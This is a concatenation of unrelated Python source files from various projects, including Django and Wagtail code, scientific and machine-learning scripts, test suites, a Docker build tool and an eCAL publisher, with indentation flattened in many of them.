group=import_item.group if import_item else None,
)
new_user_feeds.append(user_feed)
        # Best-effort check that the user's subscription count stays within the limit
user_feed_count = UserFeed.objects.filter(user_id=user_id).count()
user_feed_creation_count = FeedCreation.objects.filter(user_id=user_id).count()
user_total_feed = user_feed_count + user_feed_creation_count
free_count = max(0, MAX_FEED_COUNT - user_total_feed)
new_user_feeds = new_user_feeds[:free_count]
free_count = max(0, free_count - len(new_user_feeds))
feed_creations = feed_creations[:free_count]
        # Persist the new records
UserFeed.objects.bulk_create(new_user_feeds, batch_size=batch_size)
FeedCreation.objects.bulk_create(feed_creations, batch_size=batch_size)
if unfreeze_feed_ids:
Feed.objects.filter(pk__in=unfreeze_feed_ids).update(freeze_level=1)
existed_feeds = UnionFeed._merge_user_feeds(user_feed_map.values())
union_feeds = UnionFeed._merge_user_feeds(new_user_feeds)
return FeedCreateResult(
created_feeds=union_feeds,
existed_feeds=existed_feeds,
feed_creations=feed_creations,
)
|
1620990
|
if __name__ == "__main__":
#import cProfile, pstats, io
#pr = cProfile.Profile()
#pr.enable()
import sys
init_modules = set(sys.modules.keys())
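    # Remember the modules loaded at startup so a ReloadException can purge everything
    # imported afterwards and the REPL restarts with freshly imported code.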
while True:
from core import repl
from core.error import ReloadException, QuitException
try:
repl.Repl().run(True)
except ReloadException:
for m in reversed(list(sys.modules.keys())):
if m not in init_modules:
del sys.modules[m]
continue
except QuitException:
#pr.disable()
#s = io.StringIO()
#sortby = pstats.SortKey.CUMULATIVE
#ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
#ps.print_stats()
#with open ('stats.txt','w') as file:
#file.write(s.getvalue())
break
|
1620996
|
import numpy as np
import matplotlib as mpl
mpl.use("Agg")
import matplotlib.pyplot as plt
import dolfin as df
from finmag import Simulation
from finmag.energies import Exchange, DMI, Demag, Zeeman, UniaxialAnisotropy
from finmag.energies.zeeman import TimeZeemanPython
import matplotlib.pyplot as plt
from finmag.util.fileio import Tablereader
mesh = df.Mesh('mesh_a3cc0220d03c921e8cfa9ecf5da5fc74.xml.gz')
def relax_system():
Ms = 8.6e5
sim = Simulation(mesh, Ms, unit_length=1e-9, name = 'dy')
sim.alpha = 0.001
sim.set_m(np.load('m_000088.npy'))
#sim.set_tol(1e-6, 1e-6)
A = 1.3e-11
sim.add(Exchange(A))
parameters = {
'absolute_tolerance': 1e-10,
'relative_tolerance': 1e-10,
'maximum_iterations': int(1e5)
}
demag = Demag()
demag.parameters['phi_1'] = parameters
demag.parameters['phi_2'] = parameters
    print(demag.parameters)
sim.add(demag)
sim.schedule('save_ndt', every=2e-12)
sim.schedule('save_vtk', every=2e-12, filename='vtks/m.pvd')
sim.schedule('save_m', every=2e-12, filename='npys/m.pvd')
sim.run_until(1e-9)
def plot_mx(filename='dy.ndt'):
data = Tablereader(filename)
ts=data['time']/1e-9
fig=plt.figure()
plt.plot(ts, data['E_total'], label='Total')
#plt.plot(ts, data['E_Demag'], label='Demag')
#plt.plot(ts, data['E_Exchange'], label='Exchange')
plt.xlabel('time (ns)')
plt.ylabel('energy')
plt.legend()
fig.savefig('energy.pdf')
if __name__ == '__main__':
#relax()
#relax_system()
plot_mx()
|
1621009
|
import time
from bot_python_sdk.bot_service import BoTService
from bot_python_sdk.device_status import DeviceStatus
from bot_python_sdk.configuration_store import ConfigurationStore
from bot_python_sdk.logger import Logger
LOCATION = 'Pairing Service'
RESOURCE = 'pair'
POLLING_INTERVAL_IN_SECONDS = 10
MAXIMUM_TRIES = 10
class PairingService:
def __init__(self):
configuration = ConfigurationStore().get()
self.maker_id = configuration.get_maker_id()
self.device_id = configuration.get_device_id()
self.device_status = configuration.get_device_status()
self.bot_service = BoTService()
def run(self):
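        # Poll the BoT pairing endpoint up to MAXIMUM_TRIES times, sleeping
        # POLLING_INTERVAL_IN_SECONDS between attempts.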
        if not self.can_pair():
return
if self.device_status == DeviceStatus.MULTIPAIR:
Logger.info(LOCATION, 'Multipair mode, no need to poll or delete keys...')
return
Logger.info(LOCATION, 'Starting to pair device...')
for tries in range(1, MAXIMUM_TRIES + 1):
Logger.info(LOCATION, 'Pairing device, attempt: ' + str(tries))
if self.pair():
return True
time.sleep(POLLING_INTERVAL_IN_SECONDS)
return False
def can_pair(self):
return self.device_status == DeviceStatus.MULTIPAIR or self.device_status == DeviceStatus.NEW
def pair(self):
try:
response = self.bot_service.get(RESOURCE)
Logger.info(LOCATION, 'Pairing Response: ' + str(response))
# TODO : Make exception more specific
except:
Logger.error(LOCATION, 'Failed pairing attempt.')
return False
if response['status'] is True:
Logger.success(LOCATION, 'Device successfully paired.')
return True
else:
Logger.error(LOCATION, 'Failed pairing attempt.')
return False
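# --- usage sketch, not part of the original file ---
# Typical entry point; it assumes ConfigurationStore() already holds a
# maker_id, device_id and device_status written by a prior configuration step.
# paired = PairingService().run()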
|
1621022
|
import os.path
import pytest
from testsuite.databases.pgsql import discover
SQLDATA_PATH = os.path.join(
os.path.dirname(__file__), 'static/postgresql/schemas',
)
MIGRATIONS = os.path.join(
os.path.dirname(__file__), 'static/postgresql/migrations',
)
@pytest.fixture(scope='session')
def pgsql_local(pgsql_local_create):
databases = discover.find_databases('service', SQLDATA_PATH, MIGRATIONS)
assert sorted(databases) == [
'foo',
'multidir',
'pgmigrate',
'pgmigrate_sharded',
]
assert databases['foo'].dbname == 'foo'
assert len(databases['foo'].shards) == 2
assert databases['foo'].shards[0].dbname == 'service_foo_0'
assert databases['foo'].shards[1].dbname == 'service_foo_1'
return pgsql_local_create(list(databases.values()))
def test_shards(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['This is shard %d' % shard_id]
@pytest.mark.pgsql('foo@0', queries=['INSERT INTO foo VALUES (\'mark0\')'])
@pytest.mark.pgsql('foo@1', queries=['INSERT INTO foo VALUES (\'mark1\')'])
def test_pgsql_mark_queries(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['mark%d' % shard_id]
@pytest.mark.pgsql('foo@0', files=['custom_foo@0.sql'])
@pytest.mark.pgsql('foo@1', directories=['custom_foo@1'])
def test_pgsql_mark_files(pgsql):
for shard_id, dbname in enumerate(['foo@0', 'foo@1']):
cursor = pgsql[dbname].cursor()
cursor.execute('SELECT value from foo')
result = list(row[0] for row in cursor)
cursor.close()
assert result == ['custom%d' % shard_id]
def test_multidir_schema(pgsql):
cursor = pgsql['multidir'].cursor()
cursor.execute('SELECT value from multidir1')
result = sorted(row[0] for row in cursor)
assert result == ['first', 'second']
cursor = pgsql['multidir'].cursor()
cursor.execute('SELECT value from multidir2')
result = sorted(row[0] for row in cursor)
assert result == []
def test_migrations(pgsql):
cursor = pgsql['pgmigrate'].cursor()
cursor.execute('SELECT value from migrations')
result = list(row[0] for row in cursor)
assert result == []
def test_migrations_shards(pgsql):
cursor = pgsql['pgmigrate_sharded@0'].cursor()
cursor.execute('SELECT value0 from migrations')
result = list(row[0] for row in cursor)
assert result == []
cursor = pgsql['pgmigrate_sharded@1'].cursor()
cursor.execute('SELECT value1 from migrations')
result = list(row[0] for row in cursor)
assert result == []
|
1621026
|
import torch as th
import torch.nn as nn
import torch.nn.functional as F
class NoiseRNNAgent(nn.Module):
def __init__(self, input_shape, args):
super(NoiseRNNAgent, self).__init__()
self.args = args
self.fc1 = nn.Linear(input_shape, args.rnn_hidden_dim)
self.rnn = nn.GRUCell(args.rnn_hidden_dim, args.rnn_hidden_dim)
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions)
self.noise_fc1 = nn.Linear(args.noise_dim + args.n_agents, args.noise_embedding_dim)
self.noise_fc2 = nn.Linear(args.noise_embedding_dim, args.noise_embedding_dim)
self.noise_fc3 = nn.Linear(args.noise_embedding_dim, args.n_actions)
self.hyper = True
self.hyper_noise_fc1 = nn.Linear(args.noise_dim + args.n_agents, args.rnn_hidden_dim * args.n_actions)
def init_hidden(self):
# make hidden states on same device as model
return self.fc1.weight.new(1, self.args.rnn_hidden_dim).zero_()
def forward(self, inputs, hidden_state, noise):
agent_ids = th.eye(self.args.n_agents, device=inputs.device).repeat(noise.shape[0], 1)
noise_repeated = noise.repeat(1, self.args.n_agents).reshape(agent_ids.shape[0], -1)
x = F.relu(self.fc1(inputs))
h_in = hidden_state.reshape(-1, self.args.rnn_hidden_dim)
h = self.rnn(x, h_in)
q = self.fc2(h)
noise_input = th.cat([noise_repeated, agent_ids], dim=-1)
if self.hyper:
W = self.hyper_noise_fc1(noise_input).reshape(-1, self.args.n_actions, self.args.rnn_hidden_dim)
wq = th.bmm(W, h.unsqueeze(2))
else:
z = F.tanh(self.noise_fc1(noise_input))
z = F.tanh(self.noise_fc2(z))
wz = self.noise_fc3(z)
wq = q * wz
return wq, h
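# --- usage sketch, not part of the original file ---
# Minimal smoke test for NoiseRNNAgent. The `args` namespace is hypothetical:
# its field names are just the attributes the class reads, and the values are
# illustrative only.
if __name__ == "__main__":
    from types import SimpleNamespace
    args = SimpleNamespace(rnn_hidden_dim=64, n_actions=5, n_agents=3,
                           noise_dim=2, noise_embedding_dim=32)
    agent = NoiseRNNAgent(input_shape=10, args=args)
    batch = 4
    inputs = th.randn(batch * args.n_agents, 10)                  # one row per agent
    hidden = agent.init_hidden().repeat(batch * args.n_agents, 1)
    noise = th.randn(batch, args.noise_dim)                       # one noise vector per episode
    wq, h = agent(inputs, hidden, noise)
    print(wq.shape, h.shape)  # hyper path: (batch*n_agents, n_actions, 1), (batch*n_agents, rnn_hidden_dim)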
|
1621047
|
n = int(input())
a = list(map(int, input().split()))
m = int(input())
b = list(map(int, input().split()))
c = 0
a.sort()
b.sort()
r1 = a if len(a) > len(b) else b
r2 = b if len(a) > len(b) else a
for i in range(min(n,m)):
if r1[i]!=r2[i]:
if r2[i] not in r1:
c = c+1
elif r1[i] not in r2:
c = c+1
for i in range(abs(n-m)):
if r1[len(r2)+i] not in r2:
c=c+1
print(c)
|
1621062
|
from typing import List, Tuple
import pp
from pp.component import Component
@pp.autoname
def coupler_straight(
length: float = 10.0,
width: float = 0.5,
gap: float = 0.27,
layer: Tuple[int, int] = pp.LAYER.WG,
layers_cladding: List[Tuple[int, int]] = [pp.LAYER.WGCLAD],
cladding_offset: float = 3.0,
) -> Component:
""" straight coupled waveguides. Two multimode ports
.. plot::
:include-source:
import pp
c = pp.c.coupler_straight()
pp.plotgds(c)
"""
c = Component()
# Top path
c.add_polygon([(0, 0), (length, 0), (length, width), (0, width)], layer=layer)
y = width + gap
# Bottom path
c.add_polygon(
[(0, y), (length, y), (length, width + y), (0, width + y)], layer=layer
)
# One multimode port on each side
port_w = width * 2 + gap
c.add_port(name="W0", midpoint=[0, port_w / 2], width=port_w, orientation=180)
c.add_port(name="E0", midpoint=[length, port_w / 2], width=port_w, orientation=0)
c.width = width
c.length = length
# cladding
ymax = 2 * width + gap + cladding_offset
for layer_cladding in layers_cladding:
c.add_polygon(
[
(0, -cladding_offset),
(length, -cladding_offset),
(length, ymax),
(0, ymax),
],
layer=layer_cladding,
)
return c
@pp.autoname
def coupler_straight_biased(length=10, width=0.5, gap=0.27, layer=pp.LAYER.WG):
return coupler_straight(
width=pp.bias.width(width), gap=pp.bias.gap(gap), length=length, layer=layer
)
def _demo():
c = coupler_straight(gap=0.2)
pp.write_gds(c)
return c
if __name__ == "__main__":
# c = _demo()
c = coupler_straight_biased(width=0.5, gap=0.2)
pp.show(c)
|
1621073
|
from collections import ChainMap
class ScopedChainMap(ChainMap):
def getlevel(self, k, default_value=None, default_level=None):
"Look up a key and the level where it's stored, returning defaults if it doesn't exist"
for i, mapping in enumerate(self.maps):
try:
return mapping[k], i
except KeyError:
pass
return default_value, default_level
def set(self, k, v, non_local=True):
"Set `k` to `v`, at the scope level where `k` is already defined if `non_local`"
if non_local:
for mapping in self.maps:
if k in mapping:
mapping[k] = v
return
self.maps[0][k] = v
def setlevel(self, k, v, level=0):
"Set `k` to `v` at `level`"
self.maps[level][k] = v
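# --- usage sketch, not part of the original file ---
# Illustrates the lookup/assignment semantics; keys and values are made up.
if __name__ == '__main__':
    scopes = ScopedChainMap({'x': 1}, {'x': 10, 'y': 20})  # maps[0] is the innermost scope
    print(scopes.getlevel('y'))          # -> (20, 1): found in the outer scope
    print(scopes.getlevel('z', 0, -1))   # -> (0, -1): defaults for a missing key
    scopes.set('y', 99)                  # non_local=True writes where 'y' is already defined
    print(scopes.maps[1]['y'])           # -> 99
    scopes.setlevel('z', 7, level=0)     # explicit write into the innermost scope
    print(scopes['z'])                   # -> 7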
|
1621074
|
def print_full_name(a, b):
print("Hello %s %s! You just delved into python." % (a, b))
return
if __name__ == '__main__':
    first_name = input()
    last_name = input()
print_full_name(first_name, last_name)
|
1621081
|
from django.template.loader import render_to_string
from wagtail.core import blocks
class BaseStaticBlock(blocks.StaticBlock):
"""
This is used instead of blocks.StaticBlock to control markup in admin and apply styling
"""
def render_form(self, value, prefix='', errors=None):
return render_to_string('wagtail_advanced_form_builder/admin/blocks/base_static_block.html', {
'name': self.name,
'text': self.meta.help_text,
'classes': self.meta.form_classname,
})
|
1621095
|
import unittest
from vdebug.opts import Options,OptionsError
class OptionsTest(unittest.TestCase):
def tearDown(self):
Options.instance = None
def test_has_instance(self):
Options.set({1:"hello", 2:"world"})
self.assertIsInstance(Options.inst(), Options)
def test_get_option(self):
Options.set({'foo':"hello",'bar':"world"})
self.assertEqual("hello", Options.get('foo'))
def test_get_option_for_print(self):
Options.set({'foo':"", 'bar':"world"})
self.assertEqual("<empty>", Options.get_for_print('foo'))
self.assertEqual("world", Options.get_for_print('bar'))
def test_get_option_as_type(self):
Options.set({'foo':"1", 'bar':"2"})
opt = Options.get('foo', int)
self.assertIsInstance(opt, int)
self.assertEqual(1, opt)
def test_overwrite(self):
Options.set({'foo':"hello", 'bar':"world"})
Options.overwrite('foo', "hi")
self.assertEqual("hi", Options.get('foo'))
def test_option_is_not_set(self):
Options.set({'foo':"", 'bar':"2"})
self.assertFalse(Options.isset("monkey"))
def test_option_is_not_valid(self):
Options.set({'foo':"", 'bar':"2"})
self.assertFalse(Options.isset("foo"))
def test_option_isset(self):
Options.set({'foo':"", 'bar':"2"})
self.assertTrue(Options.isset("bar"))
def test_uninit_raises_error(self):
self.assertRaises(OptionsError, Options.isset,'something')
def test_get_raises_error(self):
Options.set({'foo':"1", 'bar':"2"})
self.assertRaises(OptionsError, Options.get,'something')
|
1621212
|
from __future__ import absolute_import
from django.db import models
from django.test import TestCase
from .models import Author, Book
signal_output = []
def pre_save_test(signal, sender, instance, **kwargs):
signal_output.append('pre_save signal, %s' % instance)
if kwargs.get('raw'):
signal_output.append('Is raw')
def post_save_test(signal, sender, instance, **kwargs):
signal_output.append('post_save signal, %s' % instance)
if 'created' in kwargs:
if kwargs['created']:
signal_output.append('Is created')
else:
signal_output.append('Is updated')
if kwargs.get('raw'):
signal_output.append('Is raw')
def pre_delete_test(signal, sender, instance, **kwargs):
    signal_output.append('pre_delete signal, %s' % instance)
    signal_output.append('instance.id is not None: %s' % (instance.id is not None))
def post_delete_test(signal, sender, instance, **kwargs):
    signal_output.append('post_delete signal, %s' % instance)
    signal_output.append('instance.id is not None: %s' % (instance.id is not None))
class SignalsRegressTests(TestCase):
"""
Testing signals before/after saving and deleting.
"""
def get_signal_output(self, fn, *args, **kwargs):
# Flush any existing signal output
global signal_output
signal_output = []
fn(*args, **kwargs)
return signal_output
def setUp(self):
# Save up the number of connected signals so that we can check at the end
# that all the signals we register get properly unregistered (#9989)
self.pre_signals = (len(models.signals.pre_save.receivers),
len(models.signals.post_save.receivers),
len(models.signals.pre_delete.receivers),
len(models.signals.post_delete.receivers))
models.signals.pre_save.connect(pre_save_test)
models.signals.post_save.connect(post_save_test)
models.signals.pre_delete.connect(pre_delete_test)
models.signals.post_delete.connect(post_delete_test)
def tearDown(self):
models.signals.post_delete.disconnect(post_delete_test)
models.signals.pre_delete.disconnect(pre_delete_test)
models.signals.post_save.disconnect(post_save_test)
models.signals.pre_save.disconnect(pre_save_test)
# Check that all our signals got disconnected properly.
post_signals = (len(models.signals.pre_save.receivers),
len(models.signals.post_save.receivers),
len(models.signals.pre_delete.receivers),
len(models.signals.post_delete.receivers))
self.assertEqual(self.pre_signals, post_signals)
def test_model_signals(self):
""" Model saves should throw some signals. """
a1 = Author(name='<NAME>')
self.assertEqual(self.get_signal_output(a1.save), [
"pre_save signal, <NAME>",
"post_save signal, <NAME>",
"Is created"
])
b1 = Book(name='Snow Crash')
self.assertEqual(self.get_signal_output(b1.save), [
"pre_save signal, Snow Crash",
"post_save signal, Snow Crash",
"Is created"
])
def test_m2m_signals(self):
""" Assigning and removing to/from m2m shouldn't generate an m2m signal """
b1 = Book(name='Snow Crash')
self.get_signal_output(b1.save)
a1 = Author(name='<NAME>')
self.get_signal_output(a1.save)
self.assertEqual(self.get_signal_output(setattr, b1, 'authors', [a1]), [])
self.assertEqual(self.get_signal_output(setattr, b1, 'authors', []), [])
|
1621252
|
import json
import os
import shlex
import shutil
import subprocess
import tarfile
import glob
from pathlib import Path
from typing import List
import wget
from pesto.cli import PROCESSING_FACTORY_PATH
from pesto.cli.core.build_config import BuildConfig
from pesto.cli.core.config_loader import ConfigLoader
from pesto.cli.core.docker_builder import DockerBuilder
from pesto.cli.core.pesto_files import PestoFiles
from pesto.cli.core.utils import PESTO_LOG
from pesto.common.utils import load_json, validate_json, mkdir
def copy_requirement(from_uri: str, target_path: str) -> None:
mkdir(target_path)
if from_uri.startswith("gs://"):
PESTO_LOG.info('copy to : {}'.format(target_path))
subprocess.call(shlex.split('gsutil cp {0} {1}'.format(from_uri.rstrip(os.path.sep), target_path)))
elif from_uri.startswith("file://") and os.path.exists(from_uri.replace("file://", "")):
shutil.copyfile(from_uri.replace("file://", ""), target_path)
else:
wget.download(url=from_uri, out=target_path)
class Builder:
SCHEMA_PATH = os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli/resources/schema')
def __init__(self, build_config: BuildConfig):
PESTO_LOG.info('***** init packaging *****')
self.build_config = build_config
self.configs = ConfigLoader.load(build_config)
PESTO_LOG.info('********** build parameters **********')
PESTO_LOG.info('{}'.format(json.dumps(build_config.__dict__, indent=4)))
PESTO_LOG.info('processing factory path : {}'.format(PROCESSING_FACTORY_PATH))
def conf_validation(self) -> None:
PESTO_LOG.info('********** validate requirements.json **********')
requirements_schema = load_json(Builder.SCHEMA_PATH, 'requirements_schema.json')
validate_json(self.configs[PestoFiles.requirements], requirements_schema)
PESTO_LOG.info('********** validate config.json **********')
validate_json(self.configs[PestoFiles.config], self.configs[PestoFiles.config_schema])
def copy_factory_files(self) -> None:
PESTO_LOG.info('********** copy factory files **********')
if os.path.exists(self.workspace):
shutil.rmtree(self.workspace)
os.makedirs(self.workspace, exist_ok=True)
PESTO_LOG.info('workspace created : {}'.format(self.workspace))
# copy pesto required resources (api_geo_process_v1.0.yaml)
PESTO_LOG.debug('COPY pesto resources to workspace from: {}'.format(PROCESSING_FACTORY_PATH))
# shutil.copytree(os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli'), os.path.join(self.workspace, 'pesto/cli'))
os.makedirs(os.path.join(self.workspace, "pesto"), exist_ok=True)
shutil.copyfile(os.path.join(PROCESSING_FACTORY_PATH, 'pesto/cli/resources/doc/api_geo_process_v1.0.yaml'),
os.path.join(self.workspace, 'pesto/api_geo_process_v1.0.yaml'))
# copy algorithm
target_path = os.path.join(self.workspace, self.build_config.name)
PESTO_LOG.debug('COPY algorithm to workspace from: {} to: {}'.format(
self.build_config.algorithm_path,
target_path))
shutil.copytree(self.build_config.algorithm_path, target_path)
# copy/update config files
shutil.rmtree(os.path.join(target_path, 'pesto', 'api'))
shutil.rmtree(os.path.join(target_path, 'pesto', 'build'))
os.makedirs(os.path.join(target_path, 'pesto', 'api'))
os.makedirs(os.path.join(target_path, 'pesto', 'build'))
for item in self.configs:
with open(os.path.join(target_path, 'pesto', item.value), 'w') as _:
json.dump(self.configs[item], _, indent=4, sort_keys=True)
def copy_requirements(self) -> None:
PESTO_LOG.info('********** copy requirements **********')
requirements = self.configs[PestoFiles.requirements]['requirements']
for name in requirements.keys():
from_uri = requirements[name]['from']
temporary_path = os.path.join(self.workspace, 'requirements', os.path.basename(from_uri))
target_path = os.path.join(self.workspace, name)
PESTO_LOG.info('COPY from {} to {}'.format(from_uri, temporary_path))
copy_requirement(from_uri, temporary_path)
if from_uri.endswith('tar.gz'):
PESTO_LOG.info('EXTRACT from {} to {}'.format(temporary_path, target_path))
with tarfile.open(temporary_path, 'r:gz') as file:
file.extractall(path=target_path)
def copy_pesto_whl(self) -> None:
PESTO_LOG.info('********** copy local pesto wheel if any **********')
source_dir = os.path.join(Path.home(), ".pesto/dist")
dest_dir = os.path.join(self.workspace, 'dist/')
os.makedirs(dest_dir, exist_ok=True)
for filename in glob.glob(os.path.join(source_dir, '*.*')):
PESTO_LOG.info('********** copy {} in {} **********'.format(filename, dest_dir))
shutil.copy(filename, dest_dir)
def build_docker_image(self) -> None:
PESTO_LOG.info('********** build docker image **********')
DockerBuilder(self.configs[PestoFiles.requirements], self.build_config).build(self.workspace)
@property
def workspace(self):
return self.build_config.workspace
def build(build_config_path: str, profiles: List[str], proxy: str = None, network: str = "host") -> None:
config = BuildConfig.from_path(path=build_config_path, profiles=profiles, proxy=proxy, network=network)
builder = Builder(config)
builder.conf_validation()
builder.copy_factory_files()
builder.copy_requirements()
builder.copy_pesto_whl()
builder.build_docker_image()
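# --- usage sketch, not part of the original file ---
# How the module-level `build` entry point is typically invoked from a CLI;
# the config path and profile name below are hypothetical placeholders.
# build(build_config_path='/path/to/build.json', profiles=['my-profile'], proxy=None, network='host')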
|
1621255
|
import functools
import inspect
import six
import lasagne.layers.base
import pymc3 as pm
from pymc3.memoize import hashable
from gelato.specs.dist import get_default_spec, FlatSpec
from gelato.specs.base import DistSpec
__all__ = [
'LayerModelMeta',
'Layer',
'MergeLayer',
'bayes'
]
class LayerModelMeta(pm.model.InitContextMeta):
"""Magic comes here
"""
def __init__(cls, what, bases, dic):
from gelato.layers.helper import find_parent
super(LayerModelMeta, cls).__init__(what, bases, dic)
# make flexible property for new class
def fget(self):
if self._name is None:
return '{}_{}'.format(self.__class__.__name__, self._fingerprint)
else:
return self._name
def fset(self, value):
if not value:
self._name = None
else:
self._name = str(value)
cls._name = None
cls.name = property(fget, fset)
# wrap init for new class
def wrap_init(__init__):
@functools.wraps(__init__)
def wrapped(self, *args, **kwargs):
name = kwargs.get('name')
self._fingerprint = hashable(self.parent)
pm.Model.__init__(self, name)
__init__(self, *args, **kwargs)
return wrapped
# wrap new for new class
def wrap_new(__new__):
@functools.wraps(__new__)
def wrapped(_cls_, *args, **kwargs):
parent = kwargs.get('model', None)
if parent is None and not issubclass(_cls_, lasagne.layers.InputLayer):
incoming = kwargs.get('incoming',
kwargs.get('incomings',
args[1]))
parent = find_parent(incoming)
kwargs['model'] = parent
instance = __new__(_cls_, *args, **kwargs)
return instance
return classmethod(wrapped)
cls.__init__ = wrap_init(cls.__init__)
cls.__new__ = wrap_new(cls.__new__)
def add_param(self, spec, shape, name=None, **tags):
if tags.get('trainable', True):
if tags.get('regularizable', True):
if not isinstance(spec, DistSpec):
# here spec is like test value
# passed to pymc3 distribution
spec = getattr(self, 'default_spec', get_default_spec(spec))
else:
spec = FlatSpec()
if name is not None:
spec = spec.with_name(name)
return lasagne.layers.base.Layer.add_param(
self, spec, shape, **tags)
cls.add_param = add_param
# needed for working with lasagne tools
def wrap_getitem(__getitem__):
@functools.wraps(__getitem__)
def wrapped(self, item):
if not isinstance(item, six.string_types):
raise TypeError('%r object accepts only string keys'
% self.__class__)
else:
                    return __getitem__(self, item)
return wrapped
cls.__getitem__ = wrap_getitem(cls.__getitem__)
def __repr__(self):
return '{}.{}'.format(self.__module__, self.__name__)
@classmethod
def __subclasshook__(cls, C):
if lasagne.layers.Layer in C.__mro__ or pm.Model in C.__mro__:
return True
else:
return False
def bayes(layercls, stack=1):
try:
issubcls = issubclass(layercls, lasagne.layers.base.Layer)
except TypeError:
raise TypeError('{} needs to be a Layer subclass'
.format(layercls))
if issubcls:
if type(layercls) is LayerModelMeta:
raise TypeError('{} is already bayesian'
.format(layercls))
else:
@six.add_metaclass(LayerModelMeta)
class BayesianAnalog(layercls, pm.Model):
pass
frm = inspect.stack()[stack]
mod = inspect.getmodule(frm[0])
if mod is None:
modname = '__main__'
else:
modname = mod.__name__
BayesianAnalog.__module__ = modname
BayesianAnalog.__doc__ = layercls.__doc__
BayesianAnalog.__name__ = layercls.__name__
return BayesianAnalog
else:
raise TypeError('{} needs to be a Layer subclass'
.format(layercls))
Layer = bayes(lasagne.layers.base.Layer)
MergeLayer = bayes(lasagne.layers.base.MergeLayer)
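# --- usage sketch, not part of the original file ---
# `bayes` turns any Lasagne layer class into a PyMC3-model-aware analogue;
# DenseLayer is only a familiar example, not something this module exports.
# BayesianDense = bayes(lasagne.layers.DenseLayer)
# layer = BayesianDense(incoming_layer, num_units=10)  # params become DistSpec-backed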
|
1621256
|
import os
from BERT_DATA import CombineBertData
split = "train"
files = "/scratch365/yding4/bert_project/bert_prep_working_dir/" \
"hdf5_lower_case_1_seq_len_128_max_pred_20_masked_lm_prob_0.15_random_seed_12345_dupe_factor_5/wikicorpus_en"
path = files
if not os.path.exists(path):
raise FileNotFoundError(
"Dataset not found: ({})".format(path)
)
files = [os.path.join(path, f) for f in os.listdir(path)] if os.path.isdir(path) else [path]
print(files)
files = [f for f in files if split in f]
print(files)
assert len(files) > 0
datasets = {}
datasets[split] = CombineBertData(files)
|
1621257
|
import numpy as np
from scipy.sparse import coo_matrix
from scipy.sparse.linalg import norm
def prepare_input(y, X, end_time):
y0, y1 = y[np.isnan(y[:, 1])], y[~np.isnan(y[:, 1])]
x0, x1 = X[np.isnan(y[:, 1])], X[~np.isnan(y[:, 1])]
diagonal0, diagonal1 = coo_matrix((y0.shape[0], y0.shape[0])), coo_matrix((y1.shape[0], y1.shape[0]))
diagonal0.setdiag(np.ones(y0.shape[0]))
diagonal1.setdiag(np.ones(y1.shape[0]))
mu = get_regularization_parameter(X)
return {'y0': y0, 'y1': y1, 'x0': x0, 'x1': x1, 'end_time': end_time, 'mu': mu,
'diagonal0': diagonal0, 'diagonal1': diagonal1}
def get_regularization_parameter(X):
n = X.shape[0]
return norm(X) ** 2 / n
def hash_all(x, mod):
x_ = np.zeros(mod)
for i in x:
x_[hash(i) % mod] += 1
return x_
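# --- worked example, not part of the original file ---
# hash_all implements the "hashing trick": each item is bucketed into one of
# `mod` slots and the slot counts are returned. For small non-negative ints,
# hash(i) == i, so hash_all([1, 2, 3, 3], mod=5) == array([0., 1., 1., 2., 0.])
# and the counts always sum to the number of input items (4 here). Note that
# hash() of str/bytes is salted per process, so string inputs land in
# different (but internally consistent) buckets between runs.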
def check_input_data(y):
assert (y[:, 0] >= 0.).all()
assert (y[~np.isnan(y[:, 1])][:, 0] <= y[~np.isnan(y[:, 1])][:, 1]).all()
class MultiEncoder:
def __init__(self, encoders):
"""
:param encoders: iterable of encoders with the property:
encoders[i].features is a subset of encoders[i+1].features
"""
self.encoders = encoders
self.dimension = len(encoders)
def dict_vectorizer(self, state):
num_common_feat = len(set(self.encoders[-1].features).intersection(state))
best_level, best_encoder = self.dimension, self.encoders[-1]
for level, encoder in reversed(list(enumerate(self.encoders))):
partial_features = set(encoder.features)
num_common_feat_level = len(partial_features.intersection(state))
if num_common_feat_level < num_common_feat:
break
else:
best_level, best_encoder = level, encoder
return best_level, best_encoder.dict_vectorizer(state)
class MultiEstimator:
def __init__(self, estimators):
self.estimators = estimators
def predict(self, x_):
level, x = x_
estimator = self.estimators[level]
return estimator.predict(x)
|
1621293
|
import sys
import time
import ecal.core.core as ecal_core
from ecal.core.publisher import StringPublisher
if __name__ == "__main__":
# initialize eCAL API. The name of our Process will be "Python Hello World Publisher"
ecal_core.initialize(sys.argv, "Python Hello World Publisher")
# Create a String Publisher that publishes on the topic "hello_world_python_topic"
pub = StringPublisher("hello_world_python_topic")
# Create a counter, so something changes in our message
counter = 0
# Infinite loop (using ecal_core.ok() will enable us to gracefully shutdown
# the process from another application)
while ecal_core.ok():
        # Create a message with a counter and publish it to the topic
current_message = "Hello World {:6d}".format(counter)
print("Sending: {}".format(current_message))
pub.send(current_message)
# Sleep 500 ms
time.sleep(0.5)
counter = counter + 1
# finalize eCAL API
ecal_core.finalize()
|
1621302
|
import unittest
import commands
import models
class TestGold(unittest.TestCase):
def test_number_gold_credit(self):
self.assertEqual(12, commands.reddit_gold.number_gold_credit())
commands.reddit_gold.store_user_buy(models.User('just-an-dev'), 1, None)
self.assertEqual(11, commands.reddit_gold.number_gold_credit())
commands.reddit_gold.store_user_buy(models.User('just-an-dev'), 7, None)
self.assertEqual(4, commands.reddit_gold.number_gold_credit())
if __name__ == '__main__':
unittest.main()
|